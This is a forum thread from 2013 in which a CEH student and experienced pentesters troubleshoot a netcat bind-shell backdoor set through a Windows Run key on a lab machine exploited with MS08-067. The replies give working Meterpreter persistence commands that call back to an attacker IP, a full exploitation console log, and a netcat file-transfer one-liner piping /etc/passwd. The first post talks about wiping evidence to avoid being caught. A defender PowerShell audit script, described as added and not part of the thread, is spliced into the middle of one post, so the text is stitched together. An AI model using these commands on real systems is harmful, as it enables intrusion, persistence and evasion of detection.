Author Topic: netcat question  (Read 2940 times)
Dalobo
« on: January 27, 2013, 07:45:47 PM »

I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:
Got a meterpreter shell on the victim
Uploaded nc.exe to the system32 folder
Set the regkey for running nc in listening mode at startup
Logged in as the admin on the victim machine
Rebooted the victim's server using the meterpreter reboot cmd
Waited for windows to reboot
Logged in as admin on the victim server
Connected from BT using nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victim's machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victim's machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

Thank you,

Dalobo

Dark_Knight
« Reply #1 on: January 27, 2013, 08:52:04 PM »

Having established a meterpreter session, do you migrate to another process?
« Last Edit: January 27, 2013, 08:56:31 PM by Dark_Knight »

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com

Dalobo
« Reply #2 on: January 28, 2013, 04:53:47 PM »

No, I did not. I used the MS08-067 to own the box. When I typed shell, and then whoami, I think I got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again

Thank you Dark_Knight.

Dalobo

ajohnson (aka dynamik)
« Reply #3 on: January 28, 2013, 05:41:23 PM »

You should be SYSTEM with MS08-067, not administrator.

It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use.

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.

Dalobo
« Reply #4 on: January 28, 2013, 06:58:12 PM »

OK. I redid this and I am NT Authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat.

I set the following key using this command:

Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\RUN -v BackDoor -d "c:\\windows\\system32\\nc.exe -L -d -p 1234 -e cmd.exe"

meterpreter > reboot

Once rebooted, I open a terminal and type:
nc 192.168.5.150 1234

I get connection refused.

I will do some more testing and get back to you.

Thank you,

Dalobo


superkojiman
« Reply #5 on: January 28, 2013, 10:01:58 PM »

Is the Windows firewall turned on? Can you check if netcat is running and listening on the port you specified after you rebooted?

OSCP, GSEC

ajohnson (aka dynamik)
« Reply #6 on: January 28, 2013, 10:24:53 PM »

I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.

If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup.

Dalobo
« Reply #7 on: February 02, 2013, 07:47:06 PM »

I still can't get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterpreter call home whenever I lose the sessions. :)

I used
Code:
run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thank you,

Dalobo

ajohnson (aka dynamik)
« Reply #8 on: February 02, 2013, 08:12:21 PM »

Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/library/cc990289(v=ws.10).aspx

There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice.

Dalobo
« Reply #9 on: February 03, 2013, 07:26:15 AM »

Thanks. I thought netcat was a way for admins to administer their boxes, without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection than a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I am doing all of this testing/learning for my CEH.

Thanks again for all the help,

Dalobo

ajohnson (aka dynamik)
« Reply #10 on: February 03, 2013, 12:47:55 PM »

I'm sure there's been an admin or two who have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it ;)

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

Code:
# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!

I also use it for copying information over the network where I don't want to set up something like file sharing.

Code:
destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999

Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf The port relaying stuff is pretty cool too.

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

Code:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013

meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013

Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:4444 -> 192.168.1.50:1031
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:443 -> 192.168.1.50:1034

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013

msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.

msf exploit(ms08_067_netapi) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013

Make sure you have your listener (multi/handler) set up and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH :)

hayabusa
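The thread's diagnosis turns on where the backdoor was registered to autostart (a Run key fires only at interactive logon, a service starts at boot) and on checking with netstat whether anything is actually listening. The script below is an added defender-side audit of exactly those locations; it is example code, not from this thread, its posters, or Metasploit. It assumes an elevated PowerShell session on the Windows host being checked, and the indicator patterns (nc.exe, "-e cmd.exe", a .vbs under TEMP, as seen in the persistence output above) are assumed starting points to tune.

```powershell
# Added example (not from the thread): audit the autostart locations discussed
# above and list what is actually listening. Run keys only fire at interactive
# logon; services start at boot. Requires an elevated PowerShell session.
function Get-SuspiciousAutostart {
    param(
        # Assumed indicator patterns (regex); tune them for your environment.
        [string[]]$Patterns = @('nc\.exe', 'netcat', '-e\s+cmd\.exe', '\\TEMP\\.*\.vbs')
    )
    $regex = $Patterns -join '|'
    $hits  = @()

    # 1. Run keys: HKLM applies to every user, each hive under HKU to one user.
    $runPaths = @('HKLM:\Software\Microsoft\Windows\CurrentVersion\Run')
    Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue | ForEach-Object {
        $runPaths += "Registry::$($_.Name)\Software\Microsoft\Windows\CurrentVersion\Run"
    }
    foreach ($path in $runPaths) {
        if (-not (Test-Path $path)) { continue }
        foreach ($p in (Get-ItemProperty -Path $path).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }     # provider metadata, not a value
            if ("$($p.Value)" -match $regex) {
                $hits += [pscustomobject]@{ Source = $path; Name = $p.Name; Command = $p.Value }
            }
        }
    }

    # 2. Services: the autostart path that needs no logged-in user.
    foreach ($svc in (Get-CimInstance Win32_Service)) {
        if ("$($svc.PathName)" -match $regex) {
            $hits += [pscustomobject]@{ Source = 'Service'; Name = $svc.Name; Command = $svc.PathName }
        }
    }
    return $hits
}

function Get-ListeningTcpPorts {
    # Parse netstat (present on XP-era hosts too) for sockets in LISTENING state.
    netstat -anp tcp | ForEach-Object {
        if ($_ -match '^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING') { [int]$Matches[1] }
    }
}

Get-SuspiciousAutostart | Format-Table -AutoSize
# Port 1234 is the bind port from the thread; substitute the one under review.
$ports = Get-ListeningTcpPorts
if ($ports -contains 1234) { 'Port 1234 is listening' } else { 'Nothing listening on 1234' }
```

A Run-key hit with nothing listening before logon is the exact symptom reported in this thread; a service hit is the variant that survives a reboot without any user present.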
« Reply #11 on: February 04, 2013, 07:11:40 AM »

Way to actually get your hands dirty and not just memorize trivia for your CEH :)

^^ +1

~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH